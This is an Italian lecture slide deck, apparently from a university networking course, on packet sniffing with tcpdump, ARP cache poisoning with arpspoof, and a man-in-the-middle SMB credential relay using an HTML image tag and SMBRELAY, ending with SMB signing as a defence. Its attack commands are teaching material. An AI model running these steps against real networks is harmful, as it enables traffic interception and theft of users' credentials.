Scaricare la presentazione
La presentazione è in caricamento. Aspetta per favore
1
Sniffing
2
Sniffer Un packet sniffer è un dispositivo di intercettazione che si connette a reti di computer ed "origlia" sul traffico di rete. Un programma di "sniffing" permette a qualcuno di ascoltare delle conversazioni tra computers. Perciò, i programmi di intercettazione di rete vengono forniti con una funzionalità nota come "analisi di protocollo", che gli permette di "decodificare" il traffico fra computer e di dargli un senso. Lo sniffing ha un vantaggio rispetto all'intercettazione telefonica: diverse reti utilizzano un "supporto condiviso".
3
Sniffer ethernet Uno Sniffer Ethernet è un programma in grado di “ascoltare” tutto il traffico che attraversa un dispositivo di rete piuttosto che intercettare solo quello indirizzato ad essa. Per consentire questa funzionalità il dispositivo di rete deve essere impostato in modalità promiscua.
4
Ethernet Ethernet è stata costruita su un principio di "condivisione": tutte le macchine sulla stessa rete, condividono lo stesso cavo. Questo comporta che tutte le macchine sono in grado di "vedere" tutto il traffico. Così, l'hardware Ethernet viene costruito con un "filtro" che ignora tutto il traffico che non gli appartiene. Fa questo ignorando tutti i frames contenenti indirizzo MAC non corrispondenti al proprio. Un programma di intercettazione disattiva questo filtro, ponendo l'hardware Ethernet in "modalità promiscua". Così Marco potrà vedere tutto il traffico tra Alice e Roberto, finchè saranno tutti sullo stesso cavo Ethernet.
5
Applicazioni Gli usi tipici di questi programmi di intercettazione includono: Analisi automatica della rete alla ricerca di passwords e nomi utente in chiaro: questo è un uso comune per gli hackers/crackers per consentirgli di accedere ai sistemi; Conversione dei dati in un formato umanamente leggibile: così che le persone possano leggere il traffico; Analisi delle anomalie: per scoprire eventuali problemi all'interno delle reti, come ad esempio, perchè il computer A non può comunicare con il computer B; Analisi delle prestazioni: per scoprire i colli di bottiglia nelle reti; Rilevazione delle intrusioni di rete: così da rilevare hackers/crackers (vedere Registrazione del traffico di rete: per creare registri a cui gli hackers non possano accedere e quindi cancellare.
6
Servizi vulnerabili Telnet e rlogin La cattura dei pacchetti permette di avere i tasti che l'utente preme man mano che questi vengono HTTP La versione di default di HTTP ha numerosi bachi. Diversi siti web utilizzano il metodo di autenticazione "Basic", che invia le password sul cavo in chiaro. Altri siti web utilizzano un'altra tecnica, richiedendo all'utente un nome utente ed una password, ma anche in questo caso i dati vengono inviati in rete in chiaro. SNMP Praticamente tutto il traffico SNMP è di tipo SNMPv1, il che non presenta un buon livello di sicurezza. Le password SNMP (chiamate stringa di comunità) vengono inviate sul cavo in chiaro. NNTP Password inviate in chiaro. Dati inviati in chiaro. POP Password inviate in chiaro. Dati inviati in chiaro. FTP Password inviate in chiaro. Dati inviati in chiaro. IMAP Password inviate in chiaro. Dati inviati in chiaro.
7
Applicativi sniffer Gli strumenti software utilizzati per eseguire Packet Sniffing sono detti “Sniffer”. Tcpdump Ethereal (grafico, ma esiste la versione testuale Tethereal) Dsniff Snort Sniffit
8
Hub e switch Per “sniffare” pacchetti occorre, fondamentalmente far funzionare lo Sniffer su una rete LAN connessa con un HUB e non con uno SWITCH. In una rete “hubbed” di n pc (A, B, C, …), se F vuole comunicare con C, i dati passano attraverso l’HUB.
9
Lo switch Uno SWITCH “conosce” sia quali sono i pc connessi, sia dove sono.
10
Ingannare lo switch Ciò rende più impegnativa l’attività di Packet Sniffing… MA NON IMPOSSIBILE!!!
11
Esempio tcpdump [ -adeflnNOpqRStuvxX ] [ -c count ]
[ -C file_size ] [ -F file ] [ -i interface ] [ -m module ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -E algo:secret ] [ expression ] Tcpdump stampa a video l’header dei pacchetti in transito su una LAN che corrispondono alle caratteristiche indicate in expression.
12
Tcpdump: expressions Con le expression si definiscono i criteri qualitativi coi quali scegliere i pacchetti da visualizzare. Le expression consistono in una o più primitive precedute da “qualificatori”. I qualificatori sono: type, dir e proto.
13
Tcpdump qualificatori
Type: host, net e port Es. ‘host ’, ‘port 22’, ecc. Dir: src, dst, src or dst Es. ‘src ’ Proto: ether, fddi, tr, ip, ip6, arp, rarp, decnet, tcp and udp Es. ‘tcp port 21‘, ‘arp net ’
14
Esempi di pacchetti cabernet:/home/bulgaro# tcpdump 'port 22'
16:30: cabernet.ing.unimo.it > twist.ing.unimo.it.ssh: S : (0) win 5840 <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) 16:30: twist.ing.unimo.it.ssh > cabernet.ing.unimo.it.40526: S : (0) ack win 5792 <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) 16:30: cabernet.ing.unimo.it > twist.ing.unimo.it.ssh: . ack 1 win 5840 <nop,nop,timestamp > (DF)
15
Attaccare una comunicazione
Consideriamo tre macchine (A, B, C) collegate mediante uno switch Usiamo tcpdump per monitorare il traffico Se A e B stanno dialogando cosa vediamo sulla tre macchine ?????
16
Il protocollo ARP All’avvio A e B dovranno scambiarsi dei messaggi che permettano di associare i loro indirizzi IP a quelli fisici Ethernet La terza macchina vedrà l’unico pacchetto: 16:38: arp who-has tell La risposta verrà inviata da a : 16:38: arp reply is at 08:00:20:77:4d:db
17
Il protocollo ARP È possibile ingannare il richiedente ?
Le tabelle ARP sono dinamiche …. Il comando arp –a permette di visualizzare la cache ARP
18
Corrompere la cache ARP
Arpspoof: Usage: arpspoof [-i interface] [-t target] host Il host è la macchina che riceve i pacchetti che vogliamo intercettare Il target è la macchina che vogliamo ingannare corrompendo la cache ARP
19
Corrompere la cache ARP
Per ottenere intergettare una intera comunicazione bilaterale occorre lanciare due volte il programma: #./arpspoof –i eth0 –t #./arpspoof –i eth0 –t
20
Completare l’opera Affinché i pacchetti ritornino poi al corretto destinatario occorre che la macchina C li forwardi verso la corretta destinazione: #echo 1 > /proc/sys/net/ipv4/ip_forward
21
MITM MITM: Man in the Middle È una tipologia di attacco
Nell’esempio precedente ci siamo inseriti in un comunicazione Potremmo modificare i pacchetti ….. Vediamo come sfruttare la situazione….
22
Attuare un attacco MITM
Un sistema windows quando cerca di accedere ad una cartella remota si presenta con login ed hash della password usata dall’utente connesso alla macchina locale Mettendosi nel mezzo si può intercettare la password Per crackarla ….. Ma non solo
23
SMB di windows Il protocollo SMB di windows serve ad accedere a file remoti Il server è attivo sulle porte TCP 139 e TCP 445 Un semplice collegamento in un pagina html forza la vittima ad accedere alla nostra macchina presentando le proprie credenziali (cifrate): <img src=file:// /null.gif height=1 width=1></img>
24
Un programma utile !? SMBRELAY può essere utilizzato per catturare queste informazioni Occorre: Disabilitare i listeners di window …. Lanciare SMBRELAY SMBRELAY /E //visualizza le interfacce SMBRELAY /IR /IL /T /R
25
Il relay Sia la macchina con SMBRELAY in esecuzione (la nostra attacente 1) Sia un secondo indirizzo IP che diamo all’interfaccia della nostra macchina Sia la nostra vittima Forziamo in qualche modo la vittima a collegarsi a (es. la pag html)
26
Attuare l’attacco SMBRELAY memorizza le credenziali della vittima quando questa cerca di accedere Interompe la sessione e ne apre una nuova verso la vittima ripresentando le stesse credenziali SMBRELAY effettuerà il relay di qualunque richiesta inviata a alla macchina vittima insieme alle sue stesse credenziali Accedendo ad un cartella condivisa: \\ \docs in realtà la nostra richiesta viene fatta rimbalzare su con le credenziali corrette
27
Come difendersi Esiste da tempo un servizio SMB signing
È possibile attivarlo agendo sul registro già in NT Server ed NT workstation (SP3) Esso annulla la possibilità di usare SMBRELAY
Presentazioni simili
© 2024 SlidePlayer.it Inc.
All rights reserved.